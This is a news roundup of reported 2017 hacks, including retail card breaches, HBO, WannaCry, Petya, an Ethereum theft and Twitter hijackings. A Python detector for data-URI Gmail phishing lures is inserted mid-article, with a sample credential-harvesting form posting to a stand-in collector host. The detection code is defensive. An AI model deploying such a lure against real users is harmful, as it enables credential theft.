The Worst Reported Hacks of 2017
Be careful what you click on.
Last year, we saw cyberattacks on Mark Zuckerberg, Olympic athletes and the DNC. We don't know what people or companies hackers will hit in 2017, but we don't need to wait long for another reminder to protect our privacy and be cautious of our online actions.
At the beginning of the year, hackers launched a major phishing scheme accessing the accounts of hundreds of Gmail users and their contacts. Also this year, we’ve seen hacking group OurMine make its 2017 debut by breaking into the WWE’s Twitter accounts and CNN’s Facebook pages.
In one of the biggest hacks yet this year, hundreds of Twitter accounts worldwide have fallen victim to Turkish hackers, posting derogatory political messages in the midst of discord between the Turkish government and the Netherlands and Germany.
Check out the worst hacks of 2017 -- so far.
Pizza Hut
Customers who placed orders on Pizza Hut’s website or mobile app on Oct. 1 or 2 might be victims of hackers. On Oct. 14, Pizza Hut sent out emails to its customers, sharing that its website had been hacked two weeks prior and that customers' confidential information, including names, emails, addresses and credit card numbers, was stolen. While the company says it believes only 1 percent of people who placed orders those days had their information stolen, that’s still about 60,000 people.
yup. so they knew this happened immediately but didn't notify customers until today. my bank acct was emptied a few days ago, had no idea pic.twitter.com/xC4vhPJg3M— (@runawaywithit) October 14, 2017
Customers’ credit card information at fast-food chain Sonic Drive-In
The payment systems at fast food chain Sonic Drive-In were hacked and the credit and debit card information of up to 5 million customers was put up for sale online in early September. Sonic confirmed the breach but has not shared any additional information.
"We are working to understand the nature and scope of this issue, as we know how important this is to our guests. We immediately engaged third-party forensic experts and law enforcement when we heard from our processor,” the company said in a statement to security news website KrebsOnSecurity.
Thousands of internal documents from HBO
Hackers broke into HBO servers in late July and stole 1.5 terabytes of data. While many people feared that the hackers might spoil Game of Thrones, it turns out the hack went much further than leaked episodes. The hackers did release episodes of Ballers, Insecure and Room 104, as well as the script for an upcoming Game of Thrones episode, but more importantly they got hold of employee data. The hackers stole “thousands of Home Box Office (HBO) internal documents,” according to the security company HBO hired to prevent the information from showing up on Google.
The hackers allegedly leaked a senior HBO executive's personal information, including newspaper subscriptions, online banking, personal health services and more. According to Variety, hackers stole “HBO’s internal administration tools, listing employee names and email addresses and their functions within the organization.”
Theft of $32 million worth of Ethereum
Two days after a hacker allegedly stole more than $7 million worth of cryptocurrency Ethereum, which is also a “decentralized platform for apps,” another hacker stole $32 million. Gavin Wood, the founder of smart contract coding company Parity, which is also an Ethereum client, announced that there was a vulnerability in Parity that led to three accounts being hacked, with a total value of nearly $32 million worth of ether. The vulnerability affected Parity version 1.5 and above.
U.S. power plants
A report from the Department of Homeland Security and the FBI reveals that malware, which may have originated in Russia, has been targeting computer networks of nuclear power plants in the U.S., specifically the Wolf Creek power plant in Burlington, Kan.
Some of the malware comes from phishing attempts, where hackers have created fake resumes embedded with malicious code for engineering control jobs, which they sent to engineers who have access to the confidential computer systems of major electrical grids. Hackers have also intercepted many engineers’ internet traffic, redirecting it through their own servers -- this sort of attack is called a “man-in-the-middle” attack.
Bithumb, the world's fourth largest Bitcoin exchange
Hackers broke into Bithumb, one of the world’s largest bitcoin exchanges, compromising data from more than 30,000 customers. According to the cryptocurrency news site BraveNewCoin, users’ mobile phone numbers and email addresses were leaked, and “billions” of won stolen (one billion won is equivalent to $870,000 currently). Many users were also victims of “voice phishing,” where scammers telephoned them, claimed they worked for Bithumb and stole their Bithumb funds.
It is still unknown who is behind the hack.
Not long after the WannaCry malware infected systems across the globe, a new strain of malware shut down computers around the world. “GoldenEye” is part of the Petya ransomware, which has hit systems in more than 65 countries, including large firms such as advertising agency WPP, food company Mondelez, Spanish legal firm DLA Piper and more.
The malware isn’t only attacking businesses though. In fact, the cyberattack began by infecting Ukraine’s electrical grid, airport and government offices. Workers at the Ukrainian nuclear plant in Chernobyl had to manually monitor radiation because of the malware. And after hitting Ukraine, the attack went global, also affecting Russian oil firm Rosneft, Denmark-based shipping company Maersk and major New Jersey pharmaceutical firm Merck.
Through a vulnerability in Microsoft Windows called “EternalBlue,” the ransomware takes over computers and demands $300 in Bitcoin from victims. Once one computer is hit by the malware, it spreads rapidly to others in its system.
The global ransomware attack “WannaCry” hacked thousands of Windows-based computers in mid-May. The cyber attack gated off users’ files and demanded that they pay in Bitcoin in order to get them unlocked.
According to European law enforcement agency Europol, more than 200,000 computers in more than 150 countries were victims of the hack. Victims include U.K. hospitals, FedEx and Russian Railways.
It didn’t stop there either. Months after the attack surfaced, WannaCry ransomware was also found to infect a Honda factory in Japan and traffic cameras in Australia. The attack forced Honda to shut down its plant in Sayama, Japan, for a day, and the company shared with Reuters that its systems were in fact hacked worldwide.
In Victoria, Australia, traffic camera systems used to fine motorists were also discovered to have been affected by the malware.
A large Lithuanian plastic surgery firm
In March, a hacking group by the name Tsar Team broke into Lithuanian plastic surgery firm Grozio Chirurgija’s database and stole thousands of patient photos, passport and credit card details. The hackers were demanding thousands of dollars in ransom from patients in Denmark, Germany, Norway and the U.K. In April, the group demanded 344,000 euros from the clinic.
While many patients paid the ransom, the clinic refused to succumb to the threat. As a result, the group published hundreds of the stolen photos online in April and, on May 30, published more than 25,000 more.
The clinic is advising people who receive ransom emails to avoid opening them or clicking any links, and instead send them to authorities.
If you visited a Chipotle restaurant between March 24 and April 17 this year, your credit card information may have been exposed to hackers. On May 26, Chipotle announced that it discovered malware behind a hack earlier this year. The fast-casual company said that “most” of its locations were affected, and in order to find out if your information was affected, Chipotle has released a locator tool that lets customers check if the location they visited was a victim of the attack.
“The malware searched for track data (which sometimes has cardholder name in addition to card number, expiration date, and internal verification code) read from the magnetic stripe of a payment card as it was being routed through the POS device,” the company said in a statement.
The company isn’t legally required to offer customers any credit protection from hacks, so it recommends filing a police report, contacting the FTC or freezing your account, reports the Verge.
Disney’s “Pirates of the Caribbean”
On May 15, hackers threatened to release one of Disney's upcoming movies unless the company paid a hefty ransom in Bitcoin.
The hackers were threatening to release 20-minute chunks of an unnamed film, which Deadline reported to be Pirates of the Caribbean: Dead Men Tell No Lies, which hit theaters on May 26.
However, Disney held its ground. CEO Bob Iger said the company will not be paying the ransom and is working with federal investigators.
On May 25, it was reported that the hack was a fake threat. “To our knowledge we were not hacked. We had a threat of a hack of a movie being stolen. We decided to take it seriously but not react in the manner in which the person who was threatening us had required,” Iger told Yahoo Finance.
On the eve of the French presidential election, President-Elect Emmanuel Macron was targeted by a “massive and coordinated” hacking attack. Tens of thousands of emails and other documents -- many of which were fake -- were released overnight in an alleged attempt to impact the election results in support of Marine Le Pen.
“You will find jokes, you will find tens of thousands of invoices from suppliers … and you will find hundreds of exchanges on the manifesto, on organising events. In fact, all that makes a campaign,” Mounir Mahjoubi, head of Macron’s digital team, told Radio France. “There are files that have been added to these archives … fake emails that have been added.”
The hack has been linked to Russian cybersecurity research firms that reportedly attacked Hillary Clinton’s campaign shortly before the U.S. election.
Dallas’ weather emergency sirens
False alarm, Dallas. On the night of April 7, around a quarter before midnight, all of the city’s 156 emergency weather sirens went off. There was no emergency. The sirens blared for an hour and a half to the city’s 1.3 million residents before city officials eventually turned off the system altogether. As it turns out, city officials ruled out a glitch in the system and named the event a hack.
“It does appear at this time it was a hack,” city spokeswoman Sana Syed shared at a news conference the following day. “And we do believe it came from the Dallas area.” Although the culprit has yet to be found, Dallas’ Mayor Mike Rawlings said the city “will work to identify and prosecute those responsible.”
Video game retailer Gamestop announced on April 7 that its online payment platform fell victim to hackers. Data from customer cards -- including card number, expiration date, name, address and alarmingly, the three-digit security code -- used to purchase items from Gamestop.com appeared to be for sale online.
In a blog post, security expert Brian Krebs shared that “Gamestop.com was likely compromised by intruders between mid-September 2016 and the first week of February 2017.”
Watch out: hackers have discovered a highly-effective phishing scheme that’s fooled users into forfeiting their login credentials. The hacker -- usually disguised as a close email contact -- is found to be sending emails with a “PDF” attachment. Upon clicking the attachment, which is not actually a PDF but appears like one, victims are led to a fake Gmail login page.
Don’t be fooled by this seemingly identical page. If you look at the browser’s URL, you’ll smell the phishy business.
The address bar says “data URI” at the beginning of it, identifying it as an imposter. Most people haven’t noticed though, instead submitting their sign-in information, essentially handing the hacker access to their accounts and all of their trusted contacts.
This is the closest I've ever come to falling for a Gmail phishing attack. If it hadn't been for my high-DPI screen making the image fuzzy… pic.twitter.com/MizEWYksBh— Tom Scott (@tomscott) December 23, 2016
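A mail-gateway style check for the lure described above, as an added example that is not part of the original article: it lists every `data:` URI link in an HTML message body and reports whether the decoded payload renders as HTML and contains a password field. The function names and the sample message are constructed for illustration.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote_to_bytes

URL_ATTRS = {"href", "src", "action", "formaction"}

def decode_data_uri(url):
    """Return (media_type, payload_bytes) for a data: URI, else None."""
    # Browsers ignore surrounding whitespace, embedded tabs/newlines and scheme case.
    url = re.sub(r"[\t\r\n]", "", url).strip()
    if not url.lower().startswith("data:"):
        return None
    header, _, body = url[5:].partition(",")
    parts = [p.strip().lower() for p in header.split(";")]
    payload = unquote_to_bytes(body)
    if "base64" in parts[1:]:
        try:
            payload = base64.b64decode(payload)
        except ValueError:
            payload = b""  # malformed base64: the link is still reported
    return parts[0] or "text/plain", payload

class UrlCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.urls = []  # (tag, url) for every URL-bearing attribute
    def handle_starttag(self, tag, attrs):
        self.urls += [(tag, v) for n, v in attrs if v and n in URL_ATTRS]

def find_data_uri_lures(html):
    collector = UrlCollector()
    collector.feed(html)
    findings = []
    for tag, url in collector.urls:
        decoded = decode_data_uri(url)
        if decoded:
            media_type, payload = decoded
            text = payload.decode("utf-8", "replace").lower()
            findings.append({"tag": tag, "media_type": media_type,
                "renders_html": media_type in ("text/html", "image/svg+xml"),
                "credential_form": bool(re.search(r"type\s*=\s*[\"']?password", text))})
    return findings

# Constructed sample: an attachment-style thumbnail whose link is a data: URI.
SAMPLE_PAGE = b'<form action="https://collector.example/"><input type="password"></form>'
SAMPLE_EMAIL = ('<a href="https://drive.example/doc/1">Shared folder</a>'
                '<a href=" DATA:text/html;base64,' + base64.b64encode(SAMPLE_PAGE).decode()
                + '"><img src="cid:thumb" alt="invoice.pdf"></a>')
```

Calling `find_data_uri_lures(SAMPLE_EMAIL)` returns a single finding for the thumbnail link; the ordinary `https:` link and the `cid:` image reference are ignored.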
World Wrestling Entertainment (WWE)
Last year, hacking group OurMine was the leader of some big-time, harmless hacks. As a means to promote its cyber security services, the company broke into social media accounts of big names such as Mark Zuckerberg, Marissa Mayer and Jack Dorsey.
The group recently hit its first big victim of 2017: the WWE. On Jan. 28, Twitter accounts of WWE and its affiliates were hacked, such as WWE Universe, WWE NXT, wrestler John Cena, WrestleMania, Summer Slam and the WWE itself, reports Mashable. The WWE’s Tumblr page was also compromised.
Per usual, the company didn’t break into these accounts -- which happened to all be linked through the WWE’s main account -- for malicious reasons. OurMine broke in and informed the company how insecure its accounts are, and offered its commercial services to help. “We’re just testing your security,” posted the company -- which seems to be its well-known tagline.
Hacking group OurMine was feeling ambitious over the Jan. 28 weekend. A day after breaking into WWE's accounts, the cyber security company went for its next victim: CNN. On Jan. 29, the main CNN Facebook page, along with CNN International and CNN Politics, was hacked.
These hacks appeared harmless: OurMine simply posted that it was just testing the security of the accounts and left its logo.
Indian airline IndiGo fell victim to cyber attacks twice. Most recently, the company’s Twitter account, which previously had more than 100,000 followers, got hijacked by someone who changed the handle to @activevibezzz1. Sadly, the company is having issues launching a new account too -- after its Twitter name was changed, its old handle name @IndiGo6e was up for grabs and someone quickly took ownership of it.
Less than a week before this incident, a hacker broke into the company's Twitter and began posting offensive tweets.
Hundreds of Twitter accounts
From Duke University to Justin Bieber to the Atlanta Police Department, Twitter accounts worldwide are being hijacked, with the hackers spreading a political message.
In the midst of Turkish President Recep Erdogan's diplomatic feud with the Netherlands and Germany, pro-Turkey hackers have been posting on various accounts referring to the upcoming April 16 elections, when a referendum will be held in Turkey that could give Erdogan more power.
Clearly pro-Erdogan, the hackers are breaking into accounts, posting tweets in Turkish, displaying the swastika, referring to Adolf Hitler and using the hashtags #Nazihollanda and #Nazialmanya, which translate to “Nazi Holland” and “Nazi Germany.” The tweets also link to a video of Erdogan.
Nobody is safe, even Justin Bieber's Japanese account got hacked pic.twitter.com/urlSw4yaOy— Arjun Kharpal (@ArjunKharpal) March 15, 2017
It’s suspected that the hackers took advantage of a vulnerability in the third-party Twitter analytics app Twitter Counter, which many organizations, businesses and people use. The hack seems to have hit nearly every industry -- media outlets, sports leagues, government departments, universities, fast food chains, celebrities and major brands have fallen victim. Forbes, BBC, Duke University, Justin Bieber's Japanese account, UNICEF USA, U.K. Department of Health, Atlanta Police Department, Sprint and Nike Spain, to name a few, have fallen victim to the hack.